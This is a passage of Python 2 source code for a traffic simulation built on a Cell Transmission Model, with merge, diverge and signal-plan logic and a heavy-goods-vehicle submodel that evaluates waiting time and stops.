#IX Index:
self.mergeFromIxs = []
self.divergeToIxs = []
self.extraDivergeToIxs =[]
self.mergeFromIxsList = []
self.divergeToIxsList = []
self.extraDivergeToIxsList =[]
self.isTurning = []
self.isInLink = []
self.isOutLink = []
self.isSignalized = []
self.turningRatiosDiverge = []
self.turningRatiosExtraDiverge = []
self.signalPlans = []
self.networkLinks =[]
# variable for evaluation:
self.waitingTime = 0
self.overallWaitingTime = 0
def readNetwork(self):
with open(NetworkFileName, 'rb') as csvfile:
spamreader = csv.reader(csvfile, delimiter=' ', quotechar='|')
self.networkLinks = range(NumberOfLinks)
for Ix in range(NumberOfLinks):
self.networkLinks[Ix] = linkInfor()
i = 0
for row in spamreader:
rowlist = row[0].split(';')
self.networkLinks[i].init_Link()
self.networkLinks[i].linkID = int(rowlist[0])
#print self.networkLinks[i].linkID
self.networkLinks[i].linkLength = int(rowlist[1])
#print self.networkLinks[i].linkLength
self.networkLinks[i].linkCapacity = int(rowlist[2])
#print 'No.of Link ' ,i
#print self.networkLinks[i].linkCapacity
self.networkLinks[i].isTurning = int(rowlist[3])
#print self.networkLinks[i].isTurning
self.networkLinks[i].isInLink = int(rowlist[4])
#print self.networkLinks[i].isInLink
self.networkLinks[i].isOutLink = int(rowlist[5])
#print self.networkLinks[i].isOutLink
self.networkLinks[i].isSignalized = int(rowlist[6])
#print self.networkLinks[i].isSignalized
mergeFromList = rowlist[7].split('|')
#print mergeFromList
self.networkLinks[i].mergeFrom = []
#print len(mergeFromList)
if mergeFromList[0]!= '':
for mergeLink in mergeFromList:
self.networkLinks[i].mergeFrom.append(int(mergeLink))
#print self.networkLinks[i].mergeFrom
divergeToList = rowlist[8].split('|')
self.networkLinks[i].divergeTo=[]
if divergeToList[0]!= '':
for divergeLink in divergeToList:
self.networkLinks[i].divergeTo.append(int(divergeLink))
#print 'self.networkLinks[i].divergeTo',self.networkLinks[i].divergeTo
extraDivergeToList = rowlist[9].split('|')
self.networkLinks[i].extraDivergeTo = []
if extraDivergeToList[0]!= '':
for exstraDivergeLink in extraDivergeToList:
self.networkLinks[i].extraDivergeTo.append(int(exstraDivergeLink))
#print self.networkLinks[i].extraDivergeTo
#
i = i+1
#print 'the No. of the link ',i
#return self.networkLinks # x, y = return(a, b), return more than 1 values
# temparary fix time plan, should be get this from GA
def readSignalPlans(self):
with open(signalPlanFileName, 'rb') as csvfile:
spamreader = csv.reader(csvfile, delimiter=' ', quotechar='|')
self.signalPlans = [0]*len(self.extraDivergeToIds)
for l in range(len(self.signalPlans)):
self.signalPlans[l] = []
i = 0
for row in spamreader:
rowlist = row[0].split(';')
for j in range(len(rowlist)):
self.signalPlans[j].append(int(rowlist[j]))
i=i+1
#print 'self.signalPlans', self.signalPlans
def buildCTM(self):
networkForCTM = self.networkLinks
#i = 0
for networkLink in networkForCTM:
self.linkIDs.append(networkLink.linkID)
#print i
#i = i +1
#print networkLink.linkCapacity
self.linkCapacitys.append((networkLink.linkCapacity)*1.6)
self.linkMaxFlows.append((networkLink.linkCapacity)*0.5)
self.isTurning.append(networkLink.isTurning)
self.isInLink.append(networkLink.isInLink)
self.isOutLink.append(networkLink.isOutLink)
self.isSignalized.append(networkLink.isSignalized)
if networkLink.linkID >= 500:
travelSpeed = 5 #speed at turning links
else:
travelSpeed = 12.5 # speed at normal links
travelTime = round(networkLink.linkLength/travelSpeed)
cellNumber = int(travelTime + 2) #include 2 vitual cells
#self.linkIndexForStatus.append(overallLengthStatus)
#overallLengthStatus = cellNumber + overallLengthStatus
currentLinkStatus = []
for cell in range(0,cellNumber):
currentLinkStatus.append(0.0)
self.currentStatuses.append(currentLinkStatus)
#self.linkIndexForFlow.append(overallLengthFlow)
#overallLengthFlow = cellNumber + overallLengthFlow - 1
currentLinkFlow = []
for FlowNumber in range(0,cellNumber-1):
currentLinkFlow.append(0.0)
self.currentFlows.append(currentLinkFlow)
#need Ixs instead of IDs
if len(networkLink.mergeFrom) != 0:
self.mergeFromIds.append(networkLink.linkID)
self.mergeFromIdsList.append(networkLink.mergeFrom)
if len(networkLink.divergeTo) != 0:
self.divergeToIds.append(networkLink.linkID)
self.divergeToIdsList.append(networkLink.divergeTo)
#temporary calculation of turning ratia, should be readed from the file
turningRatioDiverge = []
NumberOfDivergeLinks = len(networkLink.divergeTo)
turningRatioDiverge = [1/float(NumberOfDivergeLinks) for linksnumber in range(NumberOfDivergeLinks)]
self.turningRatiosDiverge.append(turningRatioDiverge)
if len(networkLink.extraDivergeTo) != 0:
self.extraDivergeToIds.append(networkLink.linkID)
self.extraDivergeToIdsList.append(networkLink.extraDivergeTo)
#temporary calculation of turning ratia, should be readed from the file
turningRatioExtraDiverge = []
NumberOfExtraDivergeLinks = len(networkLink.extraDivergeTo)
turningRatioExtraDiverge = [1/float(NumberOfExtraDivergeLinks) for linksnumber in range(NumberOfExtraDivergeLinks)]
self.turningRatiosExtraDiverge.append(turningRatioExtraDiverge)
self.previousStatuses = self.currentStatuses
self.previousFlows = self.currentFlows
#convert link id to link ix in oder to find links easily!!!!
for ml in range(len(self.mergeFromIds)):
linkIx = self.linkIDs.index(self.mergeFromIds[ml])
self.mergeFromIxs.append(linkIx)
MIdsTemp = self.mergeFromIdsList[ml]
MIxTemp = [0]*len(self.mergeFromIdsList[ml])
for mln in range(len(MIxTemp)):
MIxTemp[mln] = self.linkIDs.index(MIdsTemp[mln])
self.mergeFromIxsList.append(MIxTemp)
for dl in range(len(self.divergeToIds)):
linkIx = self.linkIDs.index(self.divergeToIds[dl])
self.divergeToIxs.append(linkIx)
DIdsTemp = self.divergeToIdsList[dl]
DIxTemp = [0]*len(self.divergeToIdsList[dl])
for dln in range(len(DIxTemp)):
DIxTemp[dln] = self.linkIDs.index(DIdsTemp[dln])
self.divergeToIxsList.append(DIxTemp)
#print 'self.divergeToIxsList:', self.divergeToIxsList
for el in range(len(self.extraDivergeToIds)):
linkIx = self.linkIDs.index(self.extraDivergeToIds[el])
self.extraDivergeToIxs.append(linkIx)
EIdsTemp = self.extraDivergeToIdsList[el]
EIxTemp = [0]*len(self.extraDivergeToIdsList[el])
for eln in range(len(EIxTemp)):
EIxTemp[eln] = self.linkIDs.index(EIdsTemp[eln])
self.extraDivergeToIxsList.append(EIxTemp)
def initFlow(self,vehcleInputs):
j = 0
#print 'vehcleInputs',vehcleInputs
for i in range(len(self.isInLink)):
if self.isInLink[i] == 1:
self.previousStatuses[i][1] = round(float(vehcleInputs[j])/float(cycleTime),3)
#print 'self.previousStatuses[1][1] during',self.previousStatuses[1][1]
j = j+1
#print 'vehcleInputs[1]',vehcleInputs[1]
#print 'initFlow self.previousStatuses[5]',self.previousStatuses[5]
# assume evrery inlink get 0.1 flow every second
#need to be assigned according to the detector data for all the inlinks
def initFlow_0(self,vehcleInputs):
j = 0
for i in range(len(self.isInLink)):
if self.isInLink[i] == 1:
#print 'vehcleInputs[j]',vehcleInputs[j]
for k in range(1,len(self.previousStatuses[i])-1):
self.previousStatuses[i][k] = round(float(vehcleInputs[j])/float(cycleTime),3)
#print 'self.currentStatuses[i][1]',self.currentStatuses[i][1]
j = j+1
# assume evrery inlink get 0.1 flow every second
#need to be assigned according to the detector data for all the inlinks
def flowModel(self):
#new empty list for currenflow and status, think about it, which model will be calculated at the very beginning , initialize should be there
currentStatuses = [0]*len(self.currentStatuses)
currentFlows = [0]*len(self.currentFlows)
for nl in range(len(self.currentStatuses)):
currentStatuses[nl] = [0.0]*len(self.currentStatuses[nl])
currentFlows[nl] = [0.0]*len(self.currentFlows[nl])
previousStatuses = self.previousStatuses[:]
previousFlows = self.previousFlows[:]
self.previousFlows = self.currentFlows[:]
self.previousStatuses = self.currentStatuses[:]
linkCapacitys = self.linkCapacitys
linkMaxFlows = self.linkMaxFlows
#check the linkIndexForStatus ?= linkIndexForFlow
for l in range(len(self.currentStatuses)):
capacity = linkCapacitys[l]
maxFlow = linkMaxFlows[l]
previousStatus = previousStatuses[l]
previousFlow = previousFlows[l]
cellNumber = len(currentStatuses[l])
#calculate flows
for c in range(cellNumber-1):
if previousStatus[c]>maxFlow:
sigma = 0.45 # proprotion between backwavespeed and freeflow speed
else:
sigma = 1.0
currentFlows[l][c] = \
round(min(previousStatus[c], maxFlow, \
sigma*(capacity-previousStatus[c+1])),3)
#update
for c2 in range(1,cellNumber-1):
currentStatuses[l][c2] = \
round(previousStatus[c2] + \
currentFlows[l][c2-1] - currentFlows[l][c2],3)
self.currentStatuses = currentStatuses
self.currentFlows = currentFlows
def waitingTimeEvaluation(self):
currentFlows = self.currentFlows
priviousStatuses = self.previousStatuses
self.waitingTime = 0
for i in range(len(currentFlows)):
currentFlow = currentFlows[i]
priviousStatus = priviousStatuses[i]
for j in range(len(currentFlow)):
self.waitingTime = self.waitingTime + abs(priviousStatus[j]-currentFlow[j])
self.overallWaitingTime = self.overallWaitingTime + self.waitingTime
#print 'Waiting time:',self.waitingTime
def mergeModel(self):
#currentStatuses = self.currentStatuses
#currentFlow = self.currentFlow
previousStatuses = self.previousStatuses
#previousFlow = self.previousFlow
linkCapacitys = self.linkCapacitys
linkMaxFlows = self.linkMaxFlows
#linkIndexForStatus = self.linkIndexForStatus
#linkIndexForFlow = self.linkIndexForFlow
linkIDs = self.linkIDs
mergeFromIxs = self.mergeFromIxs
#print 'merge from links: ',mergeFromIxs
mergeFromIxsList = self.mergeFromIxsList
#print 'merge from linkslist: ',mergeFromIxsList
for ml in range(len(mergeFromIxs)):
mergeToLinkIx = mergeFromIxs[ml]
CapacityForMergeTo = linkCapacitys[mergeToLinkIx]
toBeDistributedLinks = mergeFromIxsList[ml][:]
receivingCapacity = CapacityForMergeTo - previousStatuses[mergeToLinkIx][1]
receivingMaxflow = linkMaxFlows[mergeToLinkIx]
restOfReceivingCapacity = max(receivingCapacity,receivingMaxflow)
for step in range(len(mergeFromIxsList)-1):
#Step 1 : calculation of weighting factors for tobedistributed links
weightFactors = []
totalCapacity = 0.0 #float take care 0.0, not 0
for tbl in range(len(toBeDistributedLinks)):
#print 'toBeDistributedLinks is:'
#print toBeDistributedLinks
toBeDistributedLinkIx = toBeDistributedLinks[tbl]
totalCapacity = totalCapacity + linkCapacitys[toBeDistributedLinkIx]
for tbl in range(len(toBeDistributedLinks)):
toBeDistributedLinkIx = toBeDistributedLinks[tbl]
weightFactors.append(linkCapacitys[toBeDistributedLinkIx]/totalCapacity)
#print 'weightfactors: ', weightFactors
#step 2 actually previousToBeDistributedLinks and toBeDistributedLinks are the same, one changes another also!!!!!
#have to use [:], then only get the value of it
previousNoLinks = len(toBeDistributedLinks)
toStayLinks = []
for tbl in range(previousNoLinks):
#print 'tbl', tbl
#print 'length of toBeDistributedLinks', toBeDistributedLinks
toBeDistributedLinkIx = toBeDistributedLinks[tbl]
toBeDistributedVolume = restOfReceivingCapacity * weightFactors[tbl]
#get value from the last second cell
toBesendVolume = previousStatuses[toBeDistributedLinkIx][-2]
#print 'to be send value: ',toBesendVolume
if toBeDistributedVolume >= toBesendVolume:
previousStatuses[toBeDistributedLinkIx][-1] = \
linkCapacitys[toBeDistributedLinkIx] - toBesendVolume
restOfReceivingCapacity = restOfReceivingCapacity - toBesendVolume
#del toBeDistributedLinks[tbl]
#toBedelLinks.append(toBeDistributedLinks[tbl])
#currentNoLinks = len(toBeDistributedLinks)
#print 'build virual cell for merge from links:', currentStatuses[toBeDistributedLinkIx][-1]
else:
toStayLinks.append(toBeDistributedLinks[tbl])
toBeDistributedLinks = toStayLinks
currentNoLinks = len(toBeDistributedLinks)
if currentNoLinks == previousNoLinks:
for tbl in range(len(toBeDistributedLinks)):
toBeDistributedLinkIx = toBeDistributedLinks[tbl]
toBeDistributedVolume = restOfReceivingCapacity * weightFactors[tbl]
previousStatuses[toBeDistributedLinkIx][-1] = \
linkCapacitys[toBeDistributedLinkIx] -toBeDistributedVolume
previousStatuses[mergeToLinkIx][0] = CapacityForMergeTo - previousStatuses[mergeToLinkIx][1]
break
#step 3
#current, previous........take care
#decide the receiving value,
if toBeDistributedLinks ==[]:
for tbl in range(len(mergeFromIxsList[ml])):# this is already changed.....!!!!!
toBeDistributedLinkIx = mergeFromIxsList[ml][tbl]
previousStatuses[mergeToLinkIx][0] = previousStatuses[mergeToLinkIx][0] + \
previousStatuses[toBeDistributedLinkIx][-2]
#print 'Merge linkIx:', mergeFromIxs[ml]
#print 'currentStatuses[ml][0] a ', currentStatuses[mergeToLinkIx][0]
break
else:
previousStatuses[mergeToLinkIx][0] = min(CapacityForMergeTo - previousStatuses[mergeToLinkIx][1], receivingMaxflow)
#print 'currentStatuses[ml][0] b ', currentStatuses[mergeToLinkIx][0]
self.previousStatuses = previousStatuses
#print 'Mergemodel ctm pre sta 4',self.previousStatuses[4]
def divergeModel(self):
previousStatuses = self.previousStatuses
linkMaxFlows = self.linkMaxFlows
linkCapacitys = self.linkCapacitys# still Number of Lanes
linkIDs = self.linkIDs
divergeToIxs = self.divergeToIxs
divergeToIxsList = self.divergeToIxsList
turningRatiosList = self.turningRatiosDiverge
for dl in range(len(divergeToIxs)):
divergeFromLinkIx = divergeToIxs[dl]
CapacityOfDivergeFrom = linkCapacitys[divergeFromLinkIx]
MaximalFlowofDivergeFrom = linkMaxFlows[divergeFromLinkIx]
turningRatios = turningRatiosList[dl]
toBeDistributedLinks = divergeToIxsList[dl]
restrictedSendingByOutgoings = MaximalFlowofDivergeFrom
#define the sending ability,
for ogl in range(len(toBeDistributedLinks)):
divergeToLinkIx = toBeDistributedLinks[ogl]
CapacityOfDivergeTo = linkCapacitys[divergeToLinkIx]
MaximalFlowofDivergeTo = linkMaxFlows[divergeToLinkIx]
restrictedSendingByOutgoings = restrictedSendingByOutgoings - \
max(MaximalFlowofDivergeTo - \
(CapacityOfDivergeTo - previousStatuses[divergeToLinkIx][1])/turningRatios[ogl], 0)
#build the virtual cell for incoming / diverge from links
overallsendingAbility = min(previousStatuses[divergeFromLinkIx][-2], max(restrictedSendingByOutgoings,0))
previousStatuses[divergeFromLinkIx][-1] = CapacityOfDivergeFrom - overallsendingAbility
#build the virtual cell for outgoing / diverge to links
for ogl in range(len(toBeDistributedLinks)):
divergeToLinkIx = toBeDistributedLinks[ogl]
CapacityOfDivergeTo = linkCapacitys[divergeToLinkIx]
MaximalFlowofDivergeTo = linkMaxFlows[divergeToLinkIx]
previousStatuses[divergeToLinkIx][0] = \
min(turningRatios[ogl]*overallsendingAbility,\
MaximalFlowofDivergeTo, \
CapacityOfDivergeTo - previousStatuses[divergeToLinkIx][1])
self.previousStatuses = previousStatuses
def ExtraDivergeModel(self, timeStep):
previousStatuses = self.previousStatuses
linkMaxFlows = self.linkMaxFlows
linkCapacitys = self.linkCapacitys# still Number of Lanes
extraDivergeToIxs = self.extraDivergeToIxs
extraDivergeToIxsList = self.extraDivergeToIxsList
turningRatiosList = self.turningRatiosExtraDiverge
signalPlans = self.signalPlans
timeStepInCycle = timeStep
for dl in range(len(extraDivergeToIxs)):
divergeFromLinkIx = extraDivergeToIxs[dl]
CapacityOfDivergeFrom = linkCapacitys[divergeFromLinkIx]
MaximalFlowofDivergeFrom = linkMaxFlows[divergeFromLinkIx]
turningRatios = turningRatiosList[dl]
toBeDistributedLinks = extraDivergeToIxsList[dl]
restrictedSendingByOutgoings = MaximalFlowofDivergeFrom
if signalPlans[dl][timeStepInCycle] == 0:
previousStatuses[divergeFromLinkIx][-1] = CapacityOfDivergeFrom
for ogl in range(len(toBeDistributedLinks)):
extraDivergeToLinkIx = toBeDistributedLinks[ogl]
previousStatuses[extraDivergeToLinkIx][0] = 0
else:
#define the sending ability,
for ogl in range(len(toBeDistributedLinks)):
extraDivergeToLinkIx = toBeDistributedLinks[ogl]
CapacityOfDivergeTo = linkCapacitys[extraDivergeToLinkIx]
MaximalFlowofDivergeTo = linkMaxFlows[extraDivergeToLinkIx]
restrictedSendingByOutgoings = restrictedSendingByOutgoings - \
max(MaximalFlowofDivergeTo - \
(CapacityOfDivergeTo - previousStatuses[extraDivergeToLinkIx][1])/turningRatios[ogl], 0)
#build the virtual cell for incoming / diverge from links
overallsendingAbility = min(previousStatuses[divergeFromLinkIx][-2], max(restrictedSendingByOutgoings,0))
previousStatuses[divergeFromLinkIx][-1] = CapacityOfDivergeFrom - overallsendingAbility
#build the virtual cell for outgoing / diverge to links
for ogl in range(len(toBeDistributedLinks)):
extraDivergeToLinkIx = toBeDistributedLinks[ogl]
CapacityOfDivergeTo = linkCapacitys[extraDivergeToLinkIx]
MaximalFlowofDivergeTo = linkMaxFlows[extraDivergeToLinkIx]
previousStatuses[extraDivergeToLinkIx][0] = \
min(turningRatios[ogl]*overallsendingAbility,\
MaximalFlowofDivergeTo, \
CapacityOfDivergeTo - previousStatuses[extraDivergeToLinkIx][1])
self.previousStatuses = previousStatuses
class CNSMixModel:
def __init__(self, ctm):
self.linkIDs = ctm.linkIDs
self.linkCapacitys = ctm.linkCapacitys
self.linkMaxFlows = ctm.linkMaxFlows
self.SpeedsList = []
#self.CTM_currentStatuses = ctm.currentStatuses
self.CTM_previousStatuses = ctm.previousStatuses
self.CTM_currentFlows = ctm.currentFlows
#self.currentStatuses = []
self.previousStatuses = []
#self.currentFlows = []
self.previousFlows = []
self.SpeedsList = [0]*len(self.CTM_previousStatuses)
self.currentStatuses = [0]*len(self.CTM_previousStatuses)
#print 'currentStatuses length', len(self.currentStatuses)
self.currentFlows = [0]*len(self.CTM_currentFlows)
for nl in range(len(self.currentStatuses)):
self.SpeedsList[nl] = [0]*len(self.CTM_previousStatuses[nl])
self.currentStatuses[nl] = [0]*len(self.CTM_previousStatuses[nl])
self.currentFlows[nl] = [0]*len(self.CTM_currentFlows[nl])
#ID Index:
self.mergeFromIds = ctm.mergeFromIds
self.divergeToIds = ctm.divergeToIds
self.extraDivergeToIds = ctm.extraDivergeToIds
self.mergeFromIdsList = ctm.mergeFromIdsList
self.divergeToIdsList = ctm.divergeToIdsList
self.extraDivergeToIdsList = ctm.extraDivergeToIdsList
#IX Index:
self.mergeFromIxs = ctm.mergeFromIxs
self.divergeToIxs = ctm.divergeToIxs
self.extraDivergeToIxs = ctm.extraDivergeToIxs
self.mergeFromIxsList = ctm.mergeFromIxsList
self.divergeToIxsList = ctm.divergeToIxsList
self.extraDivergeToIxsList = ctm.extraDivergeToIxsList
self.isTurning = ctm.isTurning
self.isInLink = ctm.isInLink
self.isOutLink = ctm.isOutLink
self.isSignalized = ctm.isSignalized
self.turningRatiosDiverge = ctm.turningRatiosDiverge
self.turningRatiosExtraDiverge = ctm.turningRatiosExtraDiverge
#variable for evaluation:
self.stops = 0
self.overallStops = 0
def SpeedDiriving(self,ctm,timeStep):
# to decide if HGV can move forward:
# and initialize the statues and flows
self.CTM_previousStatuses = ctm.previousStatuses
self.CTM_currentFlows = ctm.currentFlows
self.previousStatuses = self.currentStatuses[:]
self.previousFlows = self.currentFlows[:]
self.SpeedsList = [0]*len(self.CTM_previousStatuses)
self.currentStatuses = [0]*len(self.CTM_previousStatuses)
self.currentFlows = [0]*len(self.CTM_currentFlows)
for nl in range(len(self.currentStatuses)):
self.SpeedsList[nl] = [0]*len(self.CTM_previousStatuses[nl])
self.currentStatuses[nl] = [0]*len(self.CTM_previousStatuses[nl])
self.currentFlows[nl] = [0]*len(self.CTM_currentFlows[nl])
for nl in range(len(self.SpeedsList)):
CTM_currentFlow = self.CTM_currentFlows[nl]
CTM_previousStatus = self.CTM_previousStatuses[nl]
maxFlow = self.linkMaxFlows[nl]
for nc in range(1,len(self.SpeedsList[nl])):
if CTM_currentFlow[nc-1] >= CTM_previousStatus[nc-1]*0.95 or math.fabs(CTM_currentFlow[nc-1]- maxFlow)<0.05:
self.SpeedsList[nl][nc] = 1
else:
self.SpeedsList[nl][nc] = 0
extraDivergeToIxs = ctm.extraDivergeToIxs
#extraDivergeToIxsList = ctm.extraDivergeToIxsList
#print 'extraDivergeToIxs',extraDivergeToIxs
#print 'extraDivergeToIxsList',extraDivergeToIxsList
#turningRatiosList = self.turningRatiosExtraDiverge
signalPlans = ctm.signalPlans
timeStepInCycle = timeStep
for dl in range(len(extraDivergeToIxs)):
divergeFromLinkIx = extraDivergeToIxs[dl]
if signalPlans[dl][timeStepInCycle] == 0:
self.SpeedsList[divergeFromLinkIx][-1] = 0
else:
self.SpeedsList[divergeFromLinkIx][-1] = 1
def HGVPositioning(self,HGVInputs):
#print 'HGVPositioning'
# here just some random input for test
#randomNumber = random.randint(0,100)
#if randomNumber>49:
#--------------------------------------------------------------------------------------------------------------manually data supply!!!!
HGVInputLinkIxs = [3,5,9,14,15,17,22,25,29,35,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,\
58,59,60,61,62,63,64,65,66,67,72,74,81,86,88,92,96,99,101,103,104,106,111,113,119,124,125,137,143,145,146,151]#need to check...................................................
for i in range(len(HGVInputLinkIxs)):
if len(HGVInputs[i])!=0:
linkIx = HGVInputLinkIxs[i]
HGVPositions = [0]*len(HGVInputs[i])
#print 'linkIx',linkIx
#print 'len(self.previousStatuses)',len(self.previousStatuses)
cellNumber = len(self.previousStatuses[linkIx])
for j in range(len(HGVPositions)):
HGVPositions[j] = int(HGVInputs[i][j]*cellNumber)
self.previousStatuses[linkIx][HGVPositions[j]] = self.previousStatuses[linkIx][HGVPositions[j]] + 1
def flowModel(self):
#calculate flow
for nl in range(len(self.currentFlows)):
maxFlow = int(self.linkMaxFlows[nl]*2)
for nc in range(1,len(self.SpeedsList[nl])):
if self.SpeedsList[nl][nc] == 1:
self.currentFlows[nl][nc-1] = max(0,int(min(self.previousStatuses[nl][nc-1], maxFlow, maxFlow-self.previousStatuses[nl][nc])))
else:
self.currentFlows[nl][nc-1] = 0
for ncc in range(1,len(self.SpeedsList[nl])-1):
self.currentStatuses[nl][ncc] = max(0,self.previousStatuses[nl][ncc] + self.currentFlows[nl][ncc-1] - self.currentFlows[nl][ncc])
def stopsEvaluation(self):
self.stops = 0
for i in range(len(self.previousFlows)):
for j in range(1,len(self.previousFlows[i])):
self.stops = self.stops - min((self.currentFlows[i][j]-self.previousFlows[i][j-1]),0)
self.overallStops = self.stops + self.overallStops
def initVcell(self):
for nl in range(len(self.previousStatuses)):
self.previousStatuses[nl][0] = 0
self.previousStatuses[nl][-1] = 0
def mergeModel(self):
for nl in range(len(self.mergeFromIxs)):
mergeToLinkIx = self.mergeFromIxs[nl]
mergeFromLinksIxList = self.mergeFromIxsList[nl]
mergeVolume = 0
maxMergeVolume = 0
restVolume = 0
capacity_mtl = int(self.linkMaxFlows[mergeToLinkIx]*2)
for nn in range(len(mergeFromLinksIxList)):
mergeFromLinkIx = mergeFromLinksIxList[nn]
mergeVolume = mergeVolume + self.previousStatuses[mergeFromLinkIx][-2]
if self.SpeedsList[mergeToLinkIx][1] ==1:
if mergeVolume <= capacity_mtl - self.previousStatuses[mergeToLinkIx][1]:
self.previousStatuses[mergeToLinkIx][0] = mergeVolume
for nn in range(len(mergeFromLinksIxList)):
mergeFromLinkIx = mergeFromLinksIxList[nn]
capacity_mfl = int(self.linkMaxFlows[mergeFromLinkIx]*2)
self.previousStatuses[mergeFromLinkIx][-1] = max(0,capacity_mfl - self.previousStatuses[mergeFromLinkIx][-2])
else:
maxMergeVolume = capacity_mtl - self.previousStatuses[mergeToLinkIx][1]
restVolume = maxMergeVolume
receivedVolume = 0
itN = 0
while restVolume>=1:
for nn in range(len(mergeFromLinksIxList)):
mergeFromLinkIx = random.randint(0,len(mergeFromLinksIxList)-1)
capacity_mfl = int(self.linkMaxFlows[mergeFromLinkIx]*2)
if self.previousStatuses[mergeFromLinkIx][-1] < capacity_mfl:
self.previousStatuses[mergeFromLinkIx][-1] = self.previousStatuses[mergeFromLinkIx][-1] + 1
restVolume = restVolume -1
receivedVolume = restVolume +1
itN = itN+1
if itN>len(mergeFromLinksIxList):
break
self.previousStatuses[mergeToLinkIx][0] = receivedVolume
else:
self.previousStatuses[mergeToLinkIx][0] = 0
for nn in range(len(mergeFromLinksIxList)):
mergeFromLinkIx = mergeFromLinksIxList[nn]
capacity_mfl = int(self.linkMaxFlows[mergeFromLinkIx]*2)
self.previousStatuses[mergeFromLinkIx][-1] = capacity_mfl
def divergeModel(self):
for nl in range(len(self.divergeToIxs)):
divergeFromLinkIx = self.divergeToIxs[nl]
divergeTolinksIxList = self.divergeToIxsList[nl]
turningRatios = self.turningRatiosDiverge[nl]
allValue = 0.0
distributedVehicles = 0
for nn in range(len(turningRatios)):
allValue = allValue + turningRatios[nn]
spiltPoints = [0]*len(turningRatios)
splitPoint = 0.0
for nn in range(len(turningRatios)):
spiltPoints[nn] = splitPoint + turningRatios[nn]/allValue
splitPoint = splitPoint + turningRatios[nn]/allValue
#print 'split point', spiltPoints
NoOfVehicles = 0
NoOfVehicles = self.previousStatuses[divergeFromLinkIx][-2]
irN = 0
while NoOfVehicles>=1:
if irN >=len(turningRatios):
break
irN = irN+1
randomDecision = random.random()
for nn in range(len(turningRatios)):
if randomDecision < spiltPoints[nn]:
distributedLinkIx = divergeTolinksIxList[nn]
capacity = int(self.linkMaxFlows[distributedLinkIx]*2)
if self.previousStatuses[distributedLinkIx][0] < capacity:
self.previousStatuses[distributedLinkIx][0] =\
self.previousStatuses[distributedLinkIx][0] + 1
NoOfVehicles = NoOfVehicles -1
break
distributedVehicles = self.previousStatuses[divergeFromLinkIx][-2] - NoOfVehicles
self.previousStatuses[divergeFromLinkIx][-1] = int(self.linkMaxFlows[divergeFromLinkIx]*2) - distributedVehicles
def extraDivergemodel(self):
#the same as diverge
for nl in range(len(self.extraDivergeToIxs)):
divergeFromLinkIx = self.extraDivergeToIxs[nl]
divergeTolinksIxList = self.extraDivergeToIxsList[nl]
turningRatios = self.turningRatiosExtraDiverge[nl]
allValue = 0.0
distributedVehicles = 0
if self.SpeedsList[divergeFromLinkIx][-1] == 1:
for nn in range(len(turningRatios)):
allValue = allValue + turningRatios[nn]
spiltPoints = [0]*len(turningRatios)
splitPoint = 0.0
for nn in range(len(turningRatios)):
spiltPoints[nn] = splitPoint + turningRatios[nn]/allValue
splitPoint = splitPoint + turningRatios[nn]/allValue
NoOfVehicles = 0
NoOfVehicles = self.previousStatuses[divergeFromLinkIx][-2]
testno = 0
while NoOfVehicles>=1:
if testno >= len(turningRatios):
break
testno = testno +1
randomDecision = random.random()
for nn in range(len(turningRatios)):
if randomDecision < spiltPoints[nn]:
distributedLinkIx = divergeTolinksIxList[nn]
capacity = int(self.linkMaxFlows[distributedLinkIx]*2)
if self.previousStatuses[distributedLinkIx][0] < capacity:
self.previousStatuses[distributedLinkIx][0] =\
self.previousStatuses[distributedLinkIx][0] + 1
NoOfVehicles = NoOfVehicles -1
break
distributedVehicles = self.previousStatuses[divergeFromLinkIx][-2] - NoOfVehicles
self.previousStatuses[divergeFromLinkIx][-1] = int(self.linkMaxFlows[divergeFromLinkIx]*2) - distributedVehicles
else:
self.previousStatuses[divergeFromLinkIx][-1] = int(self.linkMaxFlows[divergeFromLinkIx]*2)
for nn in range(len(turningRatios)):
distributedLinkIx = divergeTolinksIxList[nn]
self.previousStatuses[distributedLinkIx][0] = 0
def pretest():
ctm = CellTransmissionModel()
ctm.readNetwork()
ctm.buildCTM()
return ctm
def maintest(sps,vehcleInputs,HGVInputs):
#os.system('cls')
ctm = CellTransmissionModel()
ctm.readNetwork()
ctm.buildCTM()
#ctm.readSignalPlans()#get signal plan from GA
ctm.signalPlans = sps
#print 'ctm.signalPlans', ctm.signalPlans
mcns = CNSMixModel(ctm)
#get HGV from Vissim
ctm.initFlow_0(vehcleInputs)
for timeStep in range(simulationTime):
ctm.initFlow(vehcleInputs) #get traffic demand from vissim
ctm.mergeModel()
ctm.divergeModel()
ctm.ExtraDivergeModel(timeStep)
ctm.flowModel()
ctm.waitingTimeEvaluation()
mcns.SpeedDiriving(ctm,timeStep)
if timeStep == 0:
mcns.HGVPositioning(HGVInputs)
mcns.initVcell()
mcns.mergeModel()
mcns.divergeModel()
mcns.extraDivergemodel()
mcns.flowModel()
mcns.stopsEvaluation()
#mcns.stopsEvaluation()
return ctm.overallWaitingTime, mcns.overallStops
#(overallWaitingTime, mcns.overallStops) = maintest(sps)
if __name__ == '__main__':
maintest() | [
"johannes@vonoswald.de"
] | johannes@vonoswald.de |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.